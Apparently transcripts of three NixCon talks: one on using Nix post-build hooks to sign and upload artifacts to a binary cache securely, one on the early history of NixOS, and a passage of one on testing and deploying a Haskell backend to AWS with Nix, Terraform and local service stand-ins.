It's the default on NixOS, but it's not the default on a lot of the hosted CIs. Like, if you have Travis or Jenkins and you have your Docker-based CI, there's basically a shell script that you call to install Nix, and then you end up with a single-user Nix installation. Yeah, I will... no, no, no, it's one way to configure Nix in a certain case. Okay, so with that we kind of solved the direct access to the Nix store, but we did not yet solve the signing part. If we go with the bash loop approach we saw previously, we still end up signing inside the context of the CI user. So the CI user can still change stuff before uploading to the remote cache, and that's something we don't want, because this way the user can still extract the signing key, and if he has some way to access the S3 bucket or something, he could modify stuff, re-sign, and basically get code execution on other machines. So yeah, we don't want to do this. As I said, with Nix 2.3 there's a way around it: you can configure a post-build hook, which gets triggered for each realised derivation, even the intermediate ones, and in multi-user Nix it's run in the context of the Nix daemon, so as a privileged user, maybe the root user, and you don't have the problem of exposing the key to the CI user. There are some side notes regarding this: normally you don't want to execute nix copy synchronously there, because it's blocking. You basically want to queue the upload to happen in some other process, so you don't block the main build process. So let's look back at the limitations that I spoke about. The CI user doesn't have any direct access to the local Nix store anymore, and doesn't have access to the signing key. So there's no way to produce a modified, signed artifact under the original store path, which effectively fixes number four.
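The post-build hook itself can be small. The following sketch stays close to the example in the Nix manual; the key file and cache URL are placeholders, and `nix sign-paths` is again the Nix 2.3-era spelling:

```shell
#!/bin/sh
# /etc/nix/upload-to-cache.sh, wired up in nix.conf with:
#   post-build-hook = /etc/nix/upload-to-cache.sh
# The hook runs in the context of the nix-daemon, so an unprivileged CI user
# never sees the signing key. Nix sets $OUT_PATHS to the space-separated
# list of store paths that were just realised.
set -eu
set -f            # disable globbing; we word-split $OUT_PATHS on purpose
export IFS=' '
echo "Signing paths" $OUT_PATHS
nix sign-paths --key-file /etc/nix/cache-key.private $OUT_PATHS
echo "Uploading paths" $OUT_PATHS
nix copy --to 's3://example-nix-cache' $OUT_PATHS
```

As written, the `nix copy` here is still synchronous; a real deployment would replace it with something that merely enqueues the paths for a separate uploader.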
As I said, in some cloud environments users might still be able to alter files in the cache, because it's just a cloud setting that says this machine is allowed to access this bucket. But as they cannot access the signing key, substitution won't happen: Nix will verify the signature, realize it's the wrong signature, refuse to substitute from there, and it might fall back to building locally. By moving the uploading logic away from the CI pipeline into a generic post-build hook in a multi-user Nix configuration, we also fix three, because we don't need any manual scripts inside our CI process. And because the post-build hook is triggered on each derivation realised in the Nix store, no matter how we end up building it, we also solve one and two: we don't need to manually maintain another list of dependencies; we just catch all intermediate builds. So, as I said, the above architecture will automatically upload all builds happening on a certain machine into the binary cache, and it can be entirely described in the CI build slave image on your cloud provider, without the need for any cache-related configuration in the build pipeline itself. That means it's currently most suitable when you provide your own self-hosted builders, because multi-user Nix requires multiple users, and setting those up most of the time means you can't use a lot of the hosted CI solutions that use some sort of shared runners; there's often just no way to set up additional users there. But depending on your threat model, you could still start using post-build hooks in a single-user Nix setting, which will at least solve limitations one, two, and three. Yeah, that's what I already spoke about.
Yeah, another problem is that running Nix inside Docker requires privileged containers, because some of the sandboxing features currently don't work and fail, so it might be unsuitable for some container platforms. Another problem is that the official NixOS Nix Docker image doesn't provide a multi-user installation: it's based on Alpine and the shell script installing Nix. But as I said, depending on the platform you're running on, you could go with multi-user Docker containers, privileged ones, as well. So, TL;DR: use post-build hooks to upload to the cache instead of other hacks. Future plans. When new machines are spun up for ofborg, you often hit another node in the next ofborg run and have to wait again for the dependencies to be compiled. One way to fix this might be to have ofborg use not the official cache.nixos.org bucket, but another bucket that all the builders share, and we still wouldn't have to worry about paying too much money for it, because we could just nuke it: nobody's really relying on it, and we can rebuild it, either by garbage collecting or by throwing it away completely every couple of weeks. What I'd also like to see is nicer tooling in general, and documentation on how to use it. A daemon to handle the asynchronous uploads. There's a nix copy PR to support GCS that would also help in some cloud environments, but it's not strictly related to post-build hooks. And, as I said, more documentation in general on how to integrate this with CIs, so maybe a NixOS module describing how to wire this all together for your own self-hosted machines. I have some code ready that I would like to open source, but it's really not so much code. And also maybe a GitHub Actions template; I mean, with GitHub Actions, as far as I know, you cannot have multiple users, but you could at least get the single-user parts set up with post-build hooks.
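The asynchronous upload daemon mentioned above could work roughly like the following hypothetical sketch: the post-build hook only appends store paths to a spool file (cheap and non-blocking), and a separate worker drains it. The file location, function names, and the stubbed-out upload are all made up for illustration; a real worker would run `nix copy` where the stub prints.

```shell
#!/bin/sh
# Hypothetical async-upload spool; nothing here is part of Nix itself.
SPOOL="${SPOOL:-$(mktemp)}"

# Called from the post-build hook with $OUT_PATHS: just record the paths.
enqueue() {
  for p in "$@"; do
    echo "$p" >> "$SPOOL"
  done
}

# Run periodically by a separate daemon: upload, then truncate the spool.
drain() {
  [ -s "$SPOOL" ] || return 0
  while IFS= read -r p; do
    # the real worker would run: nix copy --to "$CACHE_URL" "$p"
    echo "would upload: $p"
  done < "$SPOOL"
  : > "$SPOOL"
}

enqueue /nix/store/aaaa-demo-1.0 /nix/store/bbbb-demo-deps
drain   # prints one "would upload: ..." line per queued path
```

This keeps the hook fast (a file append) while the slow network upload happens out of band, and a crash of the worker loses nothing, since the paths stay in the spool until drained.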
Yeah, and some blog posts describing this in a more readable fashion than a slide. That's it from my side. Thanks. Any questions? Have you looked into implementing a post-build hook script that can upload the source tarballs and the patch files that were used to do the build to a content-addressed tarball cache? No, but it's an interesting field for experimentation. When the post-build hook fails, does your build fail? I don't know, to be honest. Okay, and the logs of the hook: if I run this from Hydra, where do the logs of this hook go? Will they end up in the log of the build? I think it's the Nix daemon logging it. Can you get the mic? Ah, like this. Yeah. The hook output always goes to the user's terminal. If the hook fails, the build succeeds, but no further builds execute; and the hook executes synchronously and blocks other builds from progressing while it runs. Okay. You mentioned possibly doing garbage collection of the S3 buckets. Does such a function actually exist, a nix-collect-garbage or a tool to garbage collect the buckets? I think there's a Perl script, which is a bit old, but I don't think we're actually running it on cache.nixos.org, and we could dogfood this script on the ofborg bucket. All right. So if there are any more questions, feel free to hit me up after the talk. Thanks.
This talk describes how to use post-build hooks, a recently added Nix feature, to automatically sign and upload artifacts to a binary cache, so they can be re-used for subsequent builds. It compares that approach with existing ones, and explains why using post-build hooks is superior in terms of what's cached, and when it comes to building untrusted code, for example pull requests from external contributors. Finally, it shows an example of how this can be set up in a cloud provider setting, and discusses further improvements.
10.5446/50693 (DOI)
So the next talk is going to be about the Dark and Murky Past of NixOS. So it's me again. Before we start, I first want to announce a little bit of a contest. The first person to actually package this thing into nixpkgs will win this very ugly hard plastic MSN figurine. Actually, it no longer works with MSN, because MSN is no longer working, but it does work on Linux. So get cracking. And if you're thinking about adding support for this to Hydra, that's even better. Because you know what, it actually has LEDs and can flap its wings and all that. It's really cool. So if you want to be woken up in the middle of the night because your build failed, it's perfect. And I've got some more of them. So I'm going to talk about the history of NixOS, and this is not necessarily the real history, so some of the facts might have been changed for dramatic effect. But who cares? It's all in the past anyway. A little bit about me: I actually studied computer science at the university together with Eelco and Rob. And my master's thesis was NixOS: I created the very first NixOS. So it's because of me that you are here. It would have happened one way or another anyway, but I just accelerated it. After that I drifted away to do other things, at first mostly system administration. I used to be on the board of the NLUUG, formerly known as the Dutch Unix User Group. Then I got more into legal and licensing, so I was on the core team of gpl-violations.org for about seven years. And now I have my own consultancy focusing on open source license compliance, software provenance and so on. So things like reproducible builds and where software is coming from are still very important in my day-to-day job. Because when I actually have to go to court and show, well, this is where this particular software came from, then knowing exactly where it came from and how it was built is very, very important to me.
So, about me: I started using Linux and open source somewhere in 1994, FreeBSD first. Then at home we switched to Linux in 1995, Slackware. And that was before Windows 95 was released, so I only started using Windows 95 or 98 when it was already a few years old. In 1996 I started studying at Utrecht University. Eelco was actually one of the first other students that I even talked to, on the first day, so we've known each other for quite a long time. I already had some experience with Linux and FreeBSD; then we got HP-UX and IRIX (I can tell you, it's nothing like in Jurassic Park), and then Solaris a year later. And although I've used Linux exclusively for a very long time, I've always been a bit of a BSD fanboy, and I have proof. That's actually Kirk McKusick, an old Unix guy, super nice guy. If you ever meet him at a conference, just go talk to him. He knows a lot of stuff about the history of Unix, and he's done so much, it's unbelievable. Anyway, there were some frustrations. Some friends actually studied physics and they got really deep into Debian. And I was using HP-UX and IRIX, and Linux and FreeBSD at home. And whenever I said, you know, I have this problem, how should I... their default answer would be "apt-get install". That really turned me off. Come on. Every conversation ended with "apt-get install". It's like, okay, bye. If they hadn't done that, I might have been using Debian, but it was like: okay, if this is your attitude, then this is not for me. All right. So through a friend I got involved in ROCK Linux. I'm not sure if anyone here has ever heard of ROCK Linux. Oh, one person. It was a long time ago. I especially worked on the UltraSPARC port, because admittedly I was also a bit of a Sun fanboy.
But that distribution was a build-from-source thing, much like Gentoo, but a little bit before Gentoo, and maybe not as polished as Gentoo. What attracted me is that it was kind of influenced by the FreeBSD ports system, which I really liked. In the end, it wasn't a very successful project; Gentoo took its entire market basically overnight, and I just ended up installing Red Hat Linux and later Fedora Core, and have stayed with that ever since. Around 2002, I took over the management, or maybe the mismanagement, of a student lab at the university. I also got very interested in things like portability, because of my experience with other operating systems and other architectures as well. One day a very big pile of old PCs became available, and we just thought: okay, well, these are going to be trashed anyway, so why don't we do something with them? So I hauled them to the lab, we stacked them up, we installed different operating systems on them, and we started to play with build farm software: the Samba build farm, Tinderbox, also some build farm software from the University of Amsterdam whose name I've forgotten; I no longer know. Do you still know, Eelco? Forgotten too. And one test case for us was the Stratego/XT program transformation tool. So that looked a little bit like that. The person on the right is actually Martin, who was, I think, the number three committer to nixpkgs. He hasn't done anything for over a decade, I think, but he can still be found somewhere in the log. So it's a lot of beige, lots of Dell, taking up a lot of space as well. But this is what we did: we played around. And what we found is that the build farm software was suboptimal at best. Some builds would sometimes fail because I did an update of the base system: some builds would run perfectly, and then it's like, okay, there's a security update.
I would just install the security update, and then the build would fail. And debugging that would be so incredibly hard. So basically, we took the approach of: okay, well, you know, don't touch it or it will break. Of course, these machines were connected to the internet, so that's not a good idea. But it was a very useful learning experience for us. I wrote a paper about that, which you can still find; I presented it at the UKUUG Linux conference in 2003. It was in Edinburgh, very nice in summer, and it was just the start of the Fringe festival, so I got lucky. Around this time, Eelco had already started working on Nix, with one of the first use cases being release management for, again, Stratego/XT. And I have proof for that. This is from an old conference, where it actually says: release management for Stratego/XT with Nix. See, I didn't lie. Where he's also talking about stuff that I don't even understand. Like, what is it, software deployment as memory management? I think that's in your thesis, right? So if you really want to know what it all means, just read the thesis. Of course, there was already something before Nix. It was called Maak. That software never saw an official release, but at one point it did have a Wikipedia page; I think it's probably been deleted a long time ago. And a little-known fact: Bram Moolenaar, of Vim fame, was also working on a release tool called A-A-P, which was sponsored by NLnet. There they are again. And one thing is that I basically connected Bram, whom I happened to know at the time, and Eelco, and they just spent a day talking about, I don't even know what you talked about, probably about ideas about the different systems. You probably know a lot more about that. Or you might have forgotten. Mostly forgotten. It was a long time ago. So when I was looking for a project for my master's thesis, I tried some and failed. And basically I was looking for something like: okay, I really have to finish studying.
So what they actually said is: well, why don't you try to build a complete Linux distribution with Nix? Back then, some work had already been done on NixU, which was a quite minimal user-mode-Linux-based distribution. So it wasn't the kernel; it was basically some userland tools that were working. There was actually something before NixOS called NixU. I think you can still find it in the repositories. I wouldn't recommend trying it, but it's still there. But my goal was to go all the way and actually install it onto real hardware, just to make sure: can we do this, will this actually work? Because at that time we didn't know. So I took NixU and expanded on it. Because I'm quite a stubborn person, I tried to build things on my Fedora Core, while Eelco was using SUSE. And yeah, well, you know, they say Linux Standard Base... my ass. No way. There were so many differences between those two distributions that it was just painful. One of the things was with the C library, I think with the NPTL threading library; that was just a ton of pain. Fedora took a much different approach to that than SUSE did, and that just caused lots of trouble. So in the end, I convinced Eelco that this was a problem, and then he introduced a statically built environment. I think that is still more or less in Nix today, but not in the way we actually made it. My main contribution there was just to moan a lot so Eelco would actually attack this problem. And that's usually a very good strategy when dealing with Eelco: you just bitch about it. It takes some time, but then he just fixes it, like that. So I actually added quite a few of the tools there; I added most of them, I did the static builds, I added them to the Subversion repository and so on. And after that, we just started hacking. So this is a very early engineering note.
I still don't know what Eelco was trying to say here, but I think it was a little bit about how the store worked. You really have to improve your handwriting. After adding enough of the essential tools, we actually got it to work and got it transferred to some real hardware, so both virtual and real: we had some VMware virtual machines, and we also installed it on a real PC. And we were just happily playing around with it, toying around, and then all of a sudden we realized: okay, well, we forgot to create the /bin/sh symlink. But most of the tools worked. So at that time we knew: okay, well, a lot of the programs out there actually do not depend on /bin/sh being present in the system, and will just work fine without it. So, Linux Standard Base: at least for most programs, you actually don't need it. At that point, we knew that this would work, and that gave the project a major boost. And that made Eelco very happy, as I can show you here. Now, where is this? This is the worst photo that's in there. But can you see the green stuff there? The SUSE DVDs? Eelco exposed. So then we installed a new build farm, with two main machines called itchy and scratchy, and also a whole other pile of machines. We were definitely into the Simpsons, as you can tell. And eventually those two machines were completely reinstalled with NixOS, very early on. I was a little bit hesitant, but Eelco just said: we're just going to install NixOS on them and just use it on those machines. And that worked really well. I think those machines ran for, how long, four or five years? Quite a long time, doing lots and lots of builds. So it was like this, a little bit tidier, as you can see. The two main build machines were up there, and the other ones were all kinds of other machines that we installed with various operating systems. But eventually those were all scrapped.
And I think that we only used the two upper machines. So I did some more work on NixOS then. I actually made installation CDs, which I then installed on some of the machines that I showed you. And I also tried to do some cross-compilation: I actually had some old JavaStations, with a SPARC processor, and what I tried to do is create a cross-compilation environment with GCC. That turned out to be incredibly hard; I still don't know why. These days it's a lot better, but at that point in time it was just impossibly hard to do. I don't know why. Something with the include paths, or it would try to invoke a previously built compiler for the wrong platform or something, and libraries... a big mess. After that I moved away from NixOS, but I still kept contributing to a few packages for a few years. I don't think that there's much that survives to this day; I mean, maybe a few brackets here and there that you can still find when using git blame. But you know, I still have some of the pictures. People always say there are no pictures. So one thing that I can do is: Eelco dug up an old boot session, a movie of an old boot session of NixOS, in June 2005. So if you want to see that: it's very, very bare bones. I think this is actually Eelco typing. This was very, very rough, not a lot of automation going on at that point. I'm not sure why Eelco was typing so slowly. One thing that you will notice is that at this point we didn't actually set the path correctly yet, because it said "command not found" for ls. So we used echo, which was a dirty hack, but it works. In case you ever wipe your environment, that's actually a good hack. So we didn't actually set the path back then; I think we were just a few months in at this point. And just so you know, wildcards, they don't work. So I think this was definitely Eelco typing. Eventually, we could do cat there.
We just had to find the right derivation. Now, that was very old-school NixOS. So I think that's the end. All right, so to wrap up: technically I started NixOS, but since then, it is because of you that it has grown so much. So I actually want to thank you for putting so much work into it and making it a lot, lot better. Thank you. Of course, we might have some time for some more embarrassing stories, if anyone wants to hear them. Why did you move away from NixOS? I got a job, and it didn't involve NixOS. And at that point I was getting very deeply into the licensing stuff, so I basically didn't have any free time left at all to tinker with things, but I still updated a few packages here and there. Any other questions? I'm curious about this idea of running the activation script from GRUB while you're booting, whether that was an idea you had from the beginning or something you came up with along the way. This was 14 years ago; I honestly don't remember. I just needed to get stuff done, so I really don't remember. Fair enough. Are you using NixOS again now? If you actually saw my talk from yesterday: no. Right now I'm still on Fedora. Some people are trying to convince me to go back to NixOS. Rob already tried to install it while we were driving here. He said, well, just give me the laptop, I'll install it now. I just said: keep your eyes on the road, it will be a lot better. So yeah, I should get back into it, but first I have to finish a few other things; first I need to get some clients off my back. Who was the first other person you convinced to install NixOS, other than you two? Actually, in our lab, there were quite a few people quite eager to install it. I think Martin, who was the number three committer, was also very interested, and a few other people in the lab as well. And I'm not sure how it actually spread. Do you still know how it actually spread outside of our lab?
Was it through... probably through some Haskell people, I think? I really can't remember. Yeah, they were very early contributors, like Ludovic, who started Guix. I don't know when he showed up, 2007 or so. There were a few people already using it before, but I think mostly some of the Haskell people at the university started to get into it and probably spread the word. Yeah, it's all in the Git logs. I don't remember these things because they're in the logs. As soon as they started using it, they started contributing, so we can find out how it actually went. I was wondering if you can recall anything from your thesis defense? Like, were there any interesting questions? So, it was not a PhD thesis, it was just a master's thesis. I remember basically them saying that it was good enough; that was a good moment. There were just a few people there: my supervisor, Eelco, and a bunch of others. No external people. So no, I don't really recall anything. Uh-oh. Well, first of all, can I mention that the thesis defense was one week before the ten-year deadline, after which you would have had to pay back your entire student tuition? Okay, a little bit of history about that. When we started, we actually got student loans, and the period to finish was ten years. I finished it in nine years and 51 days... weeks, sorry, 51 weeks. So I had one week left. And the other thing is that you were wearing a Sick of It All T-shirt. That was the right one. Yeah. But that was just coincidence, no. I was wearing that, I think, but that wasn't a conscious decision. It's just a band, you know.
That is what it was like in the early beginning: just finding the right paths in the store and then just doing some stuff. So it was really just a proof of concept. There were some really cool master's and PhD theses that you had over there. Are there any other theses from your department that you remember that are interesting in some way to you personally? So you actually expected me to have read those theses? No, no, I wasn't into that. I was just glad that I had finished everything. I probably wasn't the right person to have an academic career. Have you had anything interesting in the lower-level, like unikernel space, with people? I only know the HaLVM Galois thing works with Nix, but have you had anything else in that space? You will have to repeat that question. Unikernels. Unikernels — that was the question. So no, the only thing that I actually focused on was just getting Linux to work. That is all I ever tried. Did you consider making it with FreeBSD instead? No. Not fanboy enough. So why not? I had already done it for Linux, and I think that with FreeBSD the whole kernel and userspace were much more tightly integrated, so it would have been a lot more difficult. With Linux, things were much more componentized, so that was actually easier. Sometimes when packaging packages for nixpkgs, we have some questions about licensing — what we can include, how we can link and so on. Would you be willing to help answer those questions? So we have another week, right? So of course I'm not a lawyer, so I can actually not give legal advice — especially in certain jurisdictions I'm not allowed to do that. But I do have thoughts about them; that is as far as I can go. But yeah, licensing and nixpkgs, that's something that could be improved — let me just say that. I think there's a lot of stuff that can be improved there. So if anyone is interested in tackling that problem, I would be more than happy to help.
All right, so did anyone manage to package it? No one? Really? So I will be here all afternoon. So if you have packaged it by then, you can just come and pick it up. So if there are no more questions, I'd like to thank you for your time and attention.
NixOS hasn't always been there, but it was created by a small team 15 years ago. In this talk you will learn how NixOS got started (and what came before), why certain design decisions that are still in NixOS today were made, and perhaps see an embarrassing picture or two.
10.5446/50694 (DOI)
So the next talk is from Nicolas Mattia, and he's going to be talking about testing for and deploying to AWS environments. Thank you. Hi everyone again. So I learned an important life lesson at NixCon this year: if you're going to a conference, aiming to give a talk is a good idea — but aim at only one. The consequence is that this one's gonna be much shorter, so feel free to interrupt, ask questions during the talk, share your experience, and hopefully we'll make it to half an hour. So during most of my career I had someone dealing with the deployment for me, and I didn't have to care about it at all — until I started this side project called DeckDeckGo, which is a presentation software, and then all of a sudden I was alone to do my deployment. I had to actually deal with setting up Postgres and everything, and I had to learn about it. So, really liking Nix, I tried to push as much of the complexity as possible inside of Nix, and I didn't really want to use Docker-based software for building or for deploying. Thank you very much. And yeah, so this is the story of my journey making Nix work for AWS. So first a bit about DeckDeckGo, which is the presentation software that I'm actually using today. The frontend is web components and TypeScript. Web components is a new standard at the W3C for basically creating new HTML tags that have some JavaScript logic in them. I have no idea how it actually works — this is not my job. My job is the rest, the backend. The backend was entirely written in Haskell, and for deployment and the build we use Nix, and the actual pushing of the artifacts and starting these servers is all Terraform. I never quite understood NixOps, so no NixOps there. From AWS we're using AWS Lambda, which is basically: you push some code and it runs somewhere; you don't have to create a machine, you don't have to set anything up — your code is just there, and whenever a request arrives it's being run.
S3 for storing presentations; SQS, which is a queue service from Amazon that we use for different lambdas to talk with each other; DynamoDB — we actually got rid of that, but at the beginning we used it, and the setup in Nix is kind of interesting so we decided to share it; and RDS, which is the relational database service of Amazon. So if you want to check out DeckDeckGo, it's fully open source, on GitHub: deckgo/deckdeckgo. It's a whole bunch of JavaScript, so that might be a bit scary, but there's some Haskell and some Nix. All the code I'm going to show during the presentation can be found in this directory here, so feel free to have a look. Now, as I said, I didn't have much time to prepare this talk so I'm missing one slide, which is the last one — and it's actually quite convenient because I can show you how DeckDeckGo works. You have a set of templates, you can select one... and there you go. So the first part is gonna be the actual lambda part. So I have this Haskell code, and this Haskell code needs to run somewhere in AWS, and for this, Lambda is great, because Lambda is really just this abstraction: you don't have to start the server, you don't have to stop it. The problem is that when you build stuff in Nix, most of the time you need a Nix store — or if you use NixOS it's very simple: just copy the closures, activate, and that's it. On Lambda you have a very limited size — I think what you push to AWS can only be 50 megabytes — so you can't fit a Nix store in there most of the time; you can't have the GHC closure with it. So the answer here is to use fully static Haskell executables, where there's no dynamic linking at all — you don't even have an interpreter bundled in your executable. And there's one guy here, Niklas — where is he? over there — big applause for him, who did amazing work on getting these to work. It's kind of a very nice project, because it's Nix, and yet it allows projects to live outside of the Nix store.
So you have these standalone artifacts, and it's using Cachix, so it's really a lot of the community coming together. And there's a funding page somewhere — you can find it on the GitHub project, nh2/static-haskell-nix — so feel free to chip in there. Now, so we build these Haskell executables and we just put them in a zip file, the zip file is sent to AWS, and it just works. The actual upload is done with Terraform. So how does this static-haskell-nix work in practice? Most of you do Haskell here, and this is using the legacy Haskell infrastructure in nixpkgs, not the newer one. I just want to show you how it works, or how you can make pretty much any executable static. So this static-haskell-nix thing is basically just a repo, and there's a survey directory which you can just import, passing it your normal packages. In this case my normal packages are just nixpkgs with some overlays adding DeckDeckGo's custom packages. And then — this is crazy — on line 16 you can see you just do survey dot packages-with-static-haskell-binaries dot haskellPackages, and there you go: you have your Haskell packages that actually compile to fully static executables. This is beautiful. And then when you create your lambda you just copy an executable, for instance this one — there are a few bugs, right, so it might break at times — just copy the executable, zip it up, and that's it. Any questions on this? Great. And then the next question is: okay, we have some stuff that's being built with Nix, but how do we teach Terraform to reuse that? And on the left there's a weird thing: this function-handler-path equals builtins.seq something, and then the function dot zip. The idea is that Terraform has this data "external" resource — well, it's not a resource, it's actually data — where you can tell it: hey Terraform, just run this command, and you can expect this command to output JSON, and then you can use this JSON in Terraform as well.
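From the description above, the survey import might look roughly like this; the exact attribute names, the overlay, and the pinned source are assumptions reconstructed from the talk, not verified against the static-haskell-nix repository:

```nix
# Hedged sketch of using static-haskell-nix's "survey" directory to get
# fully static Haskell executables. Attribute names are approximations.
let
  # Normal nixpkgs, plus DeckDeckGo's custom packages via an overlay
  # (myOverlay is a placeholder).
  normalPkgs = import <nixpkgs> { overlays = [ myOverlay ]; };

  # A checkout of nh2/static-haskell-nix (pin a specific revision in
  # practice rather than master).
  staticHaskellNix = fetchTarball
    "https://github.com/nh2/static-haskell-nix/archive/master.tar.gz";

  # Import the survey, handing it our normal package set
  survey = import "${staticHaskellNix}/survey" { inherit normalPkgs; };
in
  # Haskell packages whose executables are statically linked; zip the
  # resulting binary and hand it to Terraform for the Lambda upload.
  survey.packagesWithStaticHaskellBinaries.haskellPackages.my-handler
```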
So lines 3 to 9, this part here, are just the lambda description, and the file name is the zip file that's expected by AWS. And here this file name refers to data.external.build_function — the path — which is defined on lines 12 to 19. Most of the time in Terraform you have to say: oh Terraform, please recreate this resource if the file hash has changed, or if the time of day is later than something — we have weird ways of making sure that Terraform notices when your code changes. With Nix it's not a problem, because the entire file name is going to change whenever you change the code. So how this works is that we do a nix eval, which is basically going to evaluate something, and we tell Nix to actually print the output as JSON. This is very, very cool, very convenient, because you don't have to have any other commands that you run — just call nix eval with --json and that's it. The weird part, which is here — this is just to make sure that your function is actually being built; it's like a deep seq — because this is just an eval, right? Nix will try not to do any build, and this would give you a path back, but the path might not exist yet. So you do a bit of a dirty trick here — it's basically import-from-derivation — to make sure that the thing exists. Now I'm going to go into the AWS services themselves. So that was Lambda for the code, and now we'll talk about S3 and the rest. So the talk is about deploying to AWS, but also testing for AWS. I think this is the interesting part, because when you ship some code and deploy, you don't always want to run a staging environment where you run your integration tests. So what we're going to do here is, for each and every AWS service, try and find either an open source alternative, or some jars provided by AWS in some form, that we can use to run the services locally inside our Nix build — and then we just redirect the URLs during the tests to the local servers, and repeat for the next service.
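The forcing trick described above for the Terraform integration could be sketched like this; the attribute names are illustrative, and whether `builtins.pathExists` alone triggers the build can depend on the Nix version (the talk describes it as essentially import-from-derivation):

```nix
# Sketch of the expression that Terraform's `data "external"` block
# evaluates via `nix eval --json`. `builtins.seq` forces the existence
# check first, which realises the derivation, so the path handed back
# to Terraform actually exists on disk. Names are illustrative.
let
  pkgs = import ./nix {};
  function = pkgs.my-lambda-function;   # hypothetical attribute
in
{
  # Since the store path changes whenever the code changes, Terraform
  # notices updates without any extra hash bookkeeping.
  function-handler-path =
    builtins.seq
      (builtins.pathExists "${function}/function.zip")
      "${function}/function.zip";
}
```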
So we're going to do this for a few services. The first one is S3. So you've probably all come across Minio — who's seen it before? Okay, so Minio is an open source clone of AWS S3. It has its own protocol, but it also speaks the S3 protocol. It's a nice project; it works for my use case, which is testing. I heard people say that it was working great as a full replacement in production; I heard some people say that it wasn't that great as a full production replacement — so it depends a lot, but for testing it was just fine. And how this looks is very simple: you add Minio as an input to your derivation, you set some dummy environment variables because it requires them, and you start the server. You say localhost, port 9000, give it a temporary directory where it can actually store its artifacts, and that's it — it's running, and you run your integration tests. The last thing you need to do is actually tell your code to use localhost as opposed to the canonical AWS URL. In the case of Haskell I'm using Amazonka, and you can give your own HTTP manager to Amazonka and just tell it: hey, if you see s3.amazonaws.com, just redirect to your local one, disable HTTPS, and that works. Make sure to only use that during your tests and not in production, of course. Next one — oh, questions about S3? All right, next one is the Simple Queue Service. This is just for sending messages between lambdas using AWS. It's an AWS service; it works fine on their servers, but for this one they don't provide artifacts, they don't provide a way of running it locally, unless you use Docker. But there is an alternative one, which is ElasticMQ — very much like Minio, it's an open source clone, and it speaks the SQS protocol. So what we do is that we just grab the artifacts that they release on GitHub — it's a jar — we just java it and it runs. I feel a bit dirty inside, starting Java on my laptop, but as long as I don't have to start Docker, right?
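The Minio recipe just described, as a derivation sketch — only `pkgs.minio` is a real nixpkgs attribute here; the name, test runner and timing are illustrative:

```nix
# Minio standing in for S3 inside a sandboxed test derivation.
pkgs.stdenv.mkDerivation {
  name = "backend-tests";
  src = ./.;
  nativeBuildInputs = [ pkgs.minio ];
  doCheck = true;

  checkPhase = ''
    # Minio wants credentials even for a throwaway server
    export MINIO_ACCESS_KEY=dummy
    export MINIO_SECRET_KEY=dummydummy

    # State goes into a scratch directory inside the sandbox
    minio server --address localhost:9000 "$TMPDIR/minio-data" &

    sleep 2                      # crude wait for the server
    ./run-integration-tests      # points the S3 client at localhost:9000
  '';
}
```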
Wash, rinse, repeat, just as we did for S3: replace the host, replace the port, disable SSL, and we're good to go. DynamoDB — who here has heard of it? Yeah — for the others, it's basically like Redis: a very simple table-format database. And on this one AWS is actually pretty cool, because they do provide ways of running it locally: you can download a jar which you can just start on your laptop. By the way, all these services, even though they use the network, never require anything like sudo, and that means that everything can just run in a derivation. It's actually very nice to have your tests running fully sandboxed: if someone else in your company has run the tests before, they're going to be cached in your shared cache, if you have one — you don't even have to run the tests yourself. So you just grab any of those tarballs, unpack it in your derivation, and you just say: okay, java, start — you have some options to set the ports — and after that, your integration tests. And don't forget to tell Amazonka to use your local version of DynamoDB. Questions for this one? Great. Now, what about Postgres? So Postgres is actually interesting, because the exact same Postgres, or mostly the same Postgres, is going to be running on AWS. And for many, many years in my life I thought: okay, I have tests that need Postgres, so that means I need to install Postgres on my laptop — I need to install it through Ubuntu or as a service on NixOS. But you really don't have to do that, and this was a eureka moment for me. Postgres can use any kind of directory, and it runs as a background process if you want it to — but it doesn't have to be a system-wide background process. That means that you can even start Postgres in your nix-shell; you can start Postgres inside a derivation and just kill it at the end, and you don't have to tamper with your system-wide Postgres.
So you just tell Postgres: hey, just initialize the database in PGDATA — this is just a name I give it — you have some configuration to set, but that's about it. Then you tell it: all right, start. And from there on you have Postgres started. You just make sure that before you do anything else you give it enough time, then you create the databases you're gonna need for your tests, and that's it — run your tests, and at the end you say: all right, immediate stop, and no traces of Postgres are left on your system. Everything clear here? The really cool part about this is that all these services are provided through Nix, and they can be started and stopped at will. All these services so far have used temporary directories, so they're not gonna write anywhere else than in your temporary folder. So you can go one step further with this and say: well, I'm gonna have a shell wrapper that's actually gonna start my services whenever I develop locally. So if I don't want to do a full nix-build for my thing — maybe I'm using GHCi for development — I still need the services to be there. This is something I find very, very valuable: to have those small shell wrappers that get initialized in a shellHook and just create a few functions that you can call from your shell, from your command line. So here I have one — oh, is it big enough? Say something! Sorry? So this one is for loading Postgres, very simple, and this is where the heavy lifting happens. This start-services function is great in terms of UX: if you have coworkers that don't use Nix or don't know about Nix, they don't have to set anything up — you just tell them: enter the nix-shell, and when you want to start your services, or when you want to run your tests, just call start-services. It's gonna load Postgres, it's gonna start SQS as well, it's gonna start S3, and then anything that happens after that is gonna have access to all these services.
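The Postgres lifecycle described above — initdb into a scratch directory, start, create databases, test, immediate stop — might be sketched like this (flags, names and the test runner are illustrative):

```nix
# Throwaway Postgres inside a sandboxed derivation: no system-wide
# service, no root, no traces left outside $TMPDIR.
pkgs.stdenv.mkDerivation {
  name = "db-tests";
  src = ./.;
  nativeBuildInputs = [ pkgs.postgresql ];
  doCheck = true;

  checkPhase = ''
    export PGDATA="$TMPDIR/pg_data"
    export PGHOST="$TMPDIR"   # connect over a unix socket in $TMPDIR

    # Fresh cluster; disable TCP entirely, socket lives in $TMPDIR
    initdb
    pg_ctl start -w -o "-k $TMPDIR -c listen_addresses="

    createdb test_db          # databases the tests expect
    ./run-db-tests            # hypothetical test runner

    pg_ctl stop -m immediate  # tear down; nothing persists
  '';
}
```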
